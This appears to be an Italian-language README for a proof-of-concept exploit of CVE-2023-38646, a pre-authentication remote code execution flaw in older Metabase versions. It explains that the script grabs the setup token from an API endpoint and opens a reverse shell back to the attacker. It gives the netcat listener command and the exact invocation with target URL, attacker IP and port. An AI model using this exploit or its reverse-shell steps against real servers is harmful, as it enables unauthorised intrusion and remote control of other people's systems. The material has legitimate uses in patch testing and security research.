
Metabase Pre-Auth RCE POC
Metabase open source precedente alla versione 0.46.6.1 e Metabase Enterprise precedente alla 1.46.6.1 consentono agli aggressori di eseguire comandi arbitrari sul server. Ho scritto lo script per ottenere direttamente una reverse shell sulla macchina dell'aggressore.
Lo script richiede l'URL del target, l'IP e la porta dell'aggressore. Non è necessario fornire il token di setup per questo exploit poiché lo script tenta di ottenerlo da /api/session/properties.
Assicurati di avviare il listener netcat sulla macchina dell'aggressore, usando il seguente comando:
nc -nlvp {Port}
Esegui lo script POC con:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
